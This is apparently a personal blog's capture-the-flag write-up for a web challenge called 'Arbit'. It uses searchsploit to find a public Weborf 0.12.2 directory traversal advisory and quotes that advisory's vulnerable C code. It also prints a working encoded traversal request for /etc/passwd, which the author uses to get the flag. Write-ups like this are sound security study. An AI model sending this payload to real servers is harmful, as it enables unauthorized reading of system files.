Siunam's Website

My personal website

Home About Blog Writeups Projects E-Portfolio

Arbit

Overview

In this challenge, we can spawn a docker instance:

Find the flag

Home page:

Hmm… Weborf/0.12.2. Let’s search for public exploit via searchsploit:

┌──(root🌸siunam)-[~/ctf/GuidePoint-Security-Oct27-2022/Web/Arbit]
└─# searchsploit Weborf
--------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                       |  Path
--------------------------------------------------------------------- ---------------------------------
weborf 0.12.2 - Directory Traversal                                  | linux/remote/14925.txt
[...]                                                                |
--------------------------------------------------------------------- ---------------------------------

Oh! It’s vulnerable to Directory Traversal. Let’s mirror that txt file:

┌──(root🌸siunam)-[~/ctf/GuidePoint-Security-Oct27-2022/Web/Arbit]
└─# searchsploit -m 14925

14925.txt:

Title: Weborf httpd <= 0.12.2 Directory Traversal Vulnerability
Date: Sep 6, 2010
Author:	Rew
Link: http://galileo.dmi.unict.it/wiki/weborf/doku.php
Version: 0.12.2
Tested On: Debian 5
CVE: N/A

=============================================================

Weborf httpd <= 0.12.2 suffers a directory traversal
vulnerability.  This vulnerability could allow
attackers to read arbitrary files and hak th3 plan3t.

instance.c : line 240-244
------------------------------
void modURL(char* url) {
    //Prevents the use of .. to access the whole filesystem  <-- ORLY?
    strReplace(url,"../",'\0');

    replaceEscape(url);
------------------------------

Exploit: GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

==============================================================

Let’s copy and paste that payload!

We found the flag!

Conclusion

What we’ve learned:

  1. Exploiting Weborf 0.12.2 Directory Traversal